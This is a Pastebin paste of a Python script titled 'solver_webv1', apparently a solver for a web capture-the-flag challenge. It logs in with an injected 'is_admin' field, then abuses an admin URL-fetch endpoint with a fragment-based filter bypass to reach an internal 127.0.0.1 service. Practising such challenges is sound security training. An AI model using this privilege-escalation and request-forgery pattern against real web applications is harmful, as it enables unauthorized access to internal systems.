Advertisement
EaterSun

solver_webv1

May 11th, 2025
22
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.36 KB | Cybersecurity | 0 0
  1. import httpx
  2. import argparse
  3.  
  4.  
  5. class ArgsType:
  6. target: str
  7.  
  8.  
  9. class CredentialType:
  10. username: any
  11. password: any
  12. is_admin: any
  13.  
  14.  
  15. class Exploiter:
  16. def __init__(self, target: str, creds: CredentialType = None):
  17. self.client = httpx.Client(base_url=target)
  18. self.creds = creds
  19.  
  20. def register(self):
  21. return self.client.post("/register", data=self.creds.__dict__)
  22.  
  23. def login(self):
  24. return self.client.post("/login", data=self.creds.__dict__)
  25.  
  26. def fetch(self, url: str):
  27. return self.client.post(
  28. "/admin/fetch",
  29. data={"url": url},
  30. cookies={"session": self.client.cookies.get("session")},
  31. )
  32.  
  33. def exploit(self):
  34. # self.register()
  35. self.login()
  36. r = self.fetch("http://127.0.0.1:1337/internal#daffainfo.com")
  37. print(r.text)
  38.  
  39. @staticmethod
  40. def parse_args() -> ArgsType:
  41. parser = argparse.ArgumentParser(description="Exploit a target")
  42. parser.add_argument("-t", "--target", required=True, help="Target URL")
  43. return parser.parse_args()
  44.  
  45.  
  46. if __name__ == "__main__":
  47. creds = CredentialType()
  48. creds.username, creds.password, creds.is_admin = "rootkids", "12321", "1"
  49.  
  50. args = Exploiter.parse_args()
  51.  
  52. exploiter = Exploiter(args.target, creds)
  53. exploiter.exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement